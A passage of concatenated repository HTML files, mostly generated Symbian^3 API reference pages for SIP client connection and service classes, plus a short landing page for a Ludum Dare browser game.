name="GUID-69A3E898-B552-3EBA-A9E5-B491444CC122"> <!-- --> </a> <h2 class="topictitle2"> THCIConnectionHandle iConnectionHandle </h2> <table class="signature"> <tr> <td> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> </td> <td> iConnectionHandle </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-9283DB90-B7D9-37E4-8060-BC3BFCA578E4.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="CSIPClientConnectionReceiver" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-9283DB90-B7D9-37E4-8060-BC3BFCA578E4" /> <title> CSIPClientConnectionReceiver </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-9283DB90-B7D9-37E4-8060-BC3BFCA578E4"> <a name="GUID-9283DB90-B7D9-37E4-8060-BC3BFCA578E4"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> CSIPClientConnectionReceiver Class Reference </h1> <table class="signature"> <tr> <td> class CSIPClientConnectionReceiver : public CSIPITCReceiverBase </td> </tr> </table> <div class="section"> </div> <div class="section derivation"> <h2 class="sectiontitle"> Inherits from </h2> <ul class="derivation derivation-root"> <li class="derivation-depth-0 "> CSIPClientConnectionReceiver <ul class="derivation"> <li class="derivation-depth-1 "> <a href="GUID-7698BC23-8EAC-37CB-959D-0C7860964E63.html"> CSIPITCReceiverBase </a> <ul class="derivation"> <li class="derivation-depth-2 "> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive </a> <ul class="derivation"> <li class="derivation-depth-3 "> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase </a> </li> </ul> </li> </ul> </li> </ul> </li> </ul> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-1DCB76CA-FF92-36B0-A81E-B906C12B8B5A"> CSIPClientConnectionReceiver </a> ( <a href="GUID-8664CF1A-3325-306E-9893-EABCC22635B5.html"> RSIPConnection </a> &amp;, <a href="GUID-7905AB2A-A069-3AE3-A41B-6DB093E9E50D.html"> MSIPClientConnectionObserver </a> &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> </td> <td> <a href="#GUID-1D6C89CB-A062-318A-A165-1C76DC7523CD"> ~CSIPClientConnectionReceiver </a> () </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Private Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-DCC5D25C-E215-3282-A609-351F22E54993"> ConnectionStateChanged </a> ( <a href="GUID-2A070F4D-A35B-3505-BE86-E6C7A2F27B94.html"> CSIPConnection::TState </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-0E3A32B8-B7B8-326A-8BFD-1850C7789414"> ErrorOccured </a> ( <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp;, <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-1989995F-FBD4-396F-8A69-3DAC6837FE28"> ErrorOccuredL </a> ( <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp;, <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-E1B6881F-665C-396E-9F64-32BB507D3DEF"> IncomingRequestL </a> ( <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp;, <a href="GUID-19FB031A-CFA7-3C67-A627-CFF501060AA5.html"> CSIPRequestElements </a> *) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-1F7D7537-135D-3450-A4F2-6AC7E5139638"> IncomingResponseL </a> ( <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp;, <a href="GUID-13F32052-70BE-3B4D-9F8B-DF2DABB896B0.html"> CSIPResponseElements </a> *) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-7631799B-3DDE-3902-BBB2-8D87FD257645"> InviteCompleted </a> ( <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp;) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Functions </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::CActive(TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::Cancel() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::Deque() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::Extension_(TUint,TAny *&amp;,TAny *) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::IsActive()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::IsAdded()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::Priority()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::SetActive() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::SetPriority(TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::~CActive() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::CBase() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::Delete(CBase *) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TAny *) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TLeave) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TLeave,TUint) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TUint) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::~CBase() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-7698BC23-8EAC-37CB-959D-0C7860964E63.html"> CSIPITCReceiverBase::CSIPITCReceiverBase(MSIPITC &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-7698BC23-8EAC-37CB-959D-0C7860964E63.html"> CSIPITCReceiverBase::RemoveHttpDigestObserver() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-7698BC23-8EAC-37CB-959D-0C7860964E63.html"> CSIPITCReceiverBase::SetHttpDigestObserver(MSIPHttpDigestChallengeObserver &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-7698BC23-8EAC-37CB-959D-0C7860964E63.html"> CSIPITCReceiverBase::SetHttpDigestObserver(MSIPHttpDigestChallengeObserver2 &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-7698BC23-8EAC-37CB-959D-0C7860964E63.html"> CSIPITCReceiverBase::~CSIPITCReceiverBase() </a> </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Enumerations </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive:TPriority </a> </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Private Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-8664CF1A-3325-306E-9893-EABCC22635B5.html"> RSIPConnection </a> &amp; </td> <td> <a href="#GUID-7B961D4E-DA91-3331-B604-7EE3A573FB6A"> iConnection </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-7905AB2A-A069-3AE3-A41B-6DB093E9E50D.html"> MSIPClientConnectionObserver </a> &amp; </td> <td> <a href="#GUID-BA2241FB-1C4E-3C82-B3E2-5BE3E37EC868"> iObserver </a> </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Attributes </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-067293BF-B28C-3CEC-92F4-1351A795EA7F.html"> CActive::iStatus </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-7698BC23-8EAC-37CB-959D-0C7860964E63.html"> CSIPITCReceiverBase::iHttpDigestObserver2 </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Constructor &amp; Destructor Documentation </h1> <div class="nested1" id="GUID-1DCB76CA-FF92-36B0-A81E-B906C12B8B5A"> <a name="GUID-1DCB76CA-FF92-36B0-A81E-B906C12B8B5A"> <!-- --> </a> <h2 class="topictitle2"> CSIPClientConnectionReceiver(RSIPConnection &amp;, MSIPClientConnectionObserver &amp;) </h2> <table class="signature"> <tr> <td> CSIPClientConnectionReceiver </td> <td> ( </td> <td> <a href="GUID-8664CF1A-3325-306E-9893-EABCC22635B5.html"> RSIPConnection </a> &amp; </td> <td> aConnection, </td> </tr> <tr> <td colspan="2"> </td> <td> <a href="GUID-7905AB2A-A069-3AE3-A41B-6DB093E9E50D.html"> MSIPClientConnectionObserver </a> &amp; </td> <td> aObserver </td> </tr> <tr> <td colspan="1"> </td> <td> ) </td> <td colspan="2"> </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-8664CF1A-3325-306E-9893-EABCC22635B5.html"> RSIPConnection </a> &amp; aConnection </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-7905AB2A-A069-3AE3-A41B-6DB093E9E50D.html"> MSIPClientConnectionObserver </a> &amp; aObserver </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-1D6C89CB-A062-318A-A165-1C76DC7523CD"> <a name="GUID-1D6C89CB-A062-318A-A165-1C76DC7523CD"> <!-- --> </a> <h2 class="topictitle2"> ~CSIPClientConnectionReceiver() </h2> <table class="signature"> <tr> <td> ~CSIPClientConnectionReceiver </td> <td> ( </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> </div> </div> <h1 class="pageHeading topictitle1"> Member Functions Documentation </h1> <div class="nested1" id="GUID-DCC5D25C-E215-3282-A609-351F22E54993"> <a name="GUID-DCC5D25C-E215-3282-A609-351F22E54993"> <!-- --> </a> <h2 class="topictitle2"> ConnectionStateChanged(CSIPConnection::TState) </h2> <table class="signature"> <tr> <td> void </td> <td> ConnectionStateChanged </td> <td> ( </td> <td> <a href="GUID-2A070F4D-A35B-3505-BE86-E6C7A2F27B94.html"> CSIPConnection::TState </a> </td> <td> aState </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-2A070F4D-A35B-3505-BE86-E6C7A2F27B94.html"> CSIPConnection::TState </a> aState </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-0E3A32B8-B7B8-326A-8BFD-1850C7789414"> <a name="GUID-0E3A32B8-B7B8-326A-8BFD-1850C7789414"> <!-- --> </a> <h2 class="topictitle2"> ErrorOccured(TSIPIds &amp;, TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> ErrorOccured </td> <td> ( </td> <td> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; </td> <td> aIds, </td> </tr> <tr> <td colspan="3"> </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aError </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; aIds </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aError </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-1989995F-FBD4-396F-8A69-3DAC6837FE28"> <a name="GUID-1989995F-FBD4-396F-8A69-3DAC6837FE28"> <!-- --> </a> <h2 class="topictitle2"> ErrorOccuredL(TSIPIds &amp;, TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> ErrorOccuredL </td> <td> ( </td> <td> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; </td> <td> aIds, </td> </tr> <tr> <td colspan="3"> </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aError </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [private, virtual] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; aIds </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aError </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-E1B6881F-665C-396E-9F64-32BB507D3DEF"> <a name="GUID-E1B6881F-665C-396E-9F64-32BB507D3DEF"> <!-- --> </a> <h2 class="topictitle2"> IncomingRequestL(TSIPIds &amp;, CSIPRequestElements *) </h2> <table class="signature"> <tr> <td> void </td> <td> IncomingRequestL </td> <td> ( </td> <td> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; </td> <td> aIds, </td> </tr> <tr> <td colspan="3"> </td> <td> <a href="GUID-19FB031A-CFA7-3C67-A627-CFF501060AA5.html"> CSIPRequestElements </a> * </td> <td> aRequest </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [private, virtual] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; aIds </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-19FB031A-CFA7-3C67-A627-CFF501060AA5.html"> CSIPRequestElements </a> * aRequest </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-1F7D7537-135D-3450-A4F2-6AC7E5139638"> <a name="GUID-1F7D7537-135D-3450-A4F2-6AC7E5139638"> <!-- --> </a> <h2 class="topictitle2"> IncomingResponseL(TSIPIds &amp;, CSIPResponseElements *) </h2> <table class="signature"> <tr> <td> void </td> <td> IncomingResponseL </td> <td> ( </td> <td> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; </td> <td> aIds, </td> </tr> <tr> <td colspan="3"> </td> <td> <a href="GUID-13F32052-70BE-3B4D-9F8B-DF2DABB896B0.html"> CSIPResponseElements </a> * </td> <td> aResponse </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [private, virtual] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; aIds </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-13F32052-70BE-3B4D-9F8B-DF2DABB896B0.html"> CSIPResponseElements </a> * aResponse </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-7631799B-3DDE-3902-BBB2-8D87FD257645"> <a name="GUID-7631799B-3DDE-3902-BBB2-8D87FD257645"> <!-- --> </a> <h2 class="topictitle2"> InviteCompleted(TSIPIds &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> InviteCompleted </td> <td> ( </td> <td> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; </td> <td> aIds </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-9AF377B5-D971-33AA-8E6C-0887DEC1D93B.html"> TSIPIds </a> &amp; aIds </td> <td> </td> </tr> </table> </div> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-7B961D4E-DA91-3331-B604-7EE3A573FB6A"> <a name="GUID-7B961D4E-DA91-3331-B604-7EE3A573FB6A"> <!-- --> </a> <h2 class="topictitle2"> RSIPConnection &amp; iConnection </h2> <table class="signature"> <tr> <td> <a href="GUID-8664CF1A-3325-306E-9893-EABCC22635B5.html"> RSIPConnection </a> &amp; </td> <td> iConnection </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-BA2241FB-1C4E-3C82-B3E2-5BE3E37EC868"> <a name="GUID-BA2241FB-1C4E-3C82-B3E2-5BE3E37EC868"> <!-- --> </a> <h2 class="topictitle2"> MSIPClientConnectionObserver &amp; iObserver </h2> <table class="signature"> <tr> <td> <a href="GUID-7905AB2A-A069-3AE3-A41B-6DB093E9E50D.html"> MSIPClientConnectionObserver </a> &amp; </td> <td> iObserver </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
index.html
vsmart/mermaid-ldjam
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>mermaid-ldjam</title> <script src="js/main.js"></script> <style> html, body { font-family: Arial, sans-serif; background: #d9d4ca; color: #463C31; } .wrapper { width: 600px; display: block; margin: auto; } </style> </head> <body> <div class="wrapper"> <h1>The Mermaid Situation</h1> <canvas id="mermaid-ldjam"></canvas> <p>Click your way out of the room!</p> <p>Use <code>space</code> to drop the current action.<br> Refresh page to start over.</p> <p>Made with <3 and ClojureScript for Ludum Dare 37.</p> </div> </body> </html>
pdk/GUID-13141DCC-66B8-3ABE-87C3-83CF8425E866.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxClass"/> <meta name="DC.Title" content="TNewServiceParamPack"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-13141DCC-66B8-3ABE-87C3-83CF8425E866"/> <title>TNewServiceParamPack</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-13141DCC-66B8-3ABE-87C3-83CF8425E866"><a name="GUID-13141DCC-66B8-3ABE-87C3-83CF8425E866"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2437142 id2366654 id2366659 id2366664 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">TNewServiceParamPack Class Reference</h1> <table class="signature"><tr><td>class TNewServiceParamPack</td></tr></table><div class="section"><div> <p>Parameter class transferred through client-server interface.</p> <div class="p"> <dl class="since"> <dt class="dlterm">Since</dt> <dd>Series 60 3.0 </dd> </dl> </div> </div></div> <div class="section member-index"><table border="0" class="member-index"><thead><tr><th colspan="2">Public Attributes</th></tr></thead><tbody><tr><td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td><a href="#GUID-EC760F6D-D024-3876-8380-EEAFA326D0F4">iMultipleFiles</a></td></tr><tr class="bg"><td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td><a href="#GUID-F3B704D0-1445-36DC-B09D-5FD650708CAD">iReturnValue</a></td></tr><tr><td align="right" valign="top"> <a href="GUID-70427E76-C28D-3043-B6CE-0366BD2BA78F.html">TNewServiceFileType</a> </td><td><a href="#GUID-3A2ABE8C-FB03-3A41-ABB0-ECEEAAA62E1D">iType</a></td></tr></tbody></table></div><h1 class="pageHeading topictitle1">Member Data Documentation</h1><div class="nested1" id="GUID-EC760F6D-D024-3876-8380-EEAFA326D0F4"><a name="GUID-EC760F6D-D024-3876-8380-EEAFA326D0F4"><!-- --></a> <h2 class="topictitle2"> TBool iMultipleFiles</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td>iMultipleFiles</td></tr></table><div class="section"></div> </div> <div class="nested1" id="GUID-F3B704D0-1445-36DC-B09D-5FD650708CAD"><a name="GUID-F3B704D0-1445-36DC-B09D-5FD650708CAD"><!-- --></a> <h2 class="topictitle2"> TBool iReturnValue</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td>iReturnValue</td></tr></table><div class="section"></div> </div> <div class="nested1" id="GUID-3A2ABE8C-FB03-3A41-ABB0-ECEEAAA62E1D"><a name="GUID-3A2ABE8C-FB03-3A41-ABB0-ECEEAAA62E1D"><!-- --></a> <h2 class="topictitle2"> TNewServiceFileType iType</h2> <table class="signature"><tr><td> <a href="GUID-70427E76-C28D-3043-B6CE-0366BD2BA78F.html">TNewServiceFileType</a> </td><td>iType</td></tr></table><div class="section"></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
pdk/guid-6013a680-57f9-415b-8851-c4fa63356636/class_c_service_advertiser.html
warlordh/fork_Symbian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>TB9.2 Example Applications: CServiceAdvertiser Class Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> <link type="text/css" rel="stylesheet" href="../css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="../css/sdl.css" media="screen"/> <!--[if IE]> <link href="../css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> </head> <body class="kernelguide"> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Product Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <!-- Generated by Doxygen 1.6.2 --> <div class="contents"> <h1>CServiceAdvertiser Class Reference</h1><!-- doxytag: class="CServiceAdvertiser" --> <p><a href="class_c_service_advertiser-members.html">List of all members.</a></p> <table border="0" cellpadding="0" cellspacing="0"> <tr><td colspan="2"><h2>Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_service_advertiser.html#a2f8c410fff06231459357dadf91c300b">~CServiceAdvertiser</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_service_advertiser.html#a472557c615ce3eb0a59f64bb1f6a0de1">StartAdvertiserL</a> (TInt)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_service_advertiser.html#a7a05532cd0a9fb44ab40f1ffa1ff1c39">StopAdvertiserL</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_service_advertiser.html#ab1c8f92e638fed6da1718268407b05eb">UpdateAvailabilityL</a> (TBool)</td></tr> <tr><td colspan="2"><h2>Static Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="class_c_service_advertiser.html">CServiceAdvertiser</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_service_advertiser.html#a806cb9d464c1416a6441a9aba38b203c">NewL</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="class_c_service_advertiser.html">CServiceAdvertiser</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_service_advertiser.html#ae9caf6f124248cc0e8f93e7263894ba7">NewLC</a> ()</td></tr> </table> <hr/><a name="_details"></a><h2>Detailed Description</h2> <p>Definition at line <a class="el" href="_service_advertiser_8h_source.html#l00021">21</a> of file <a class="el" 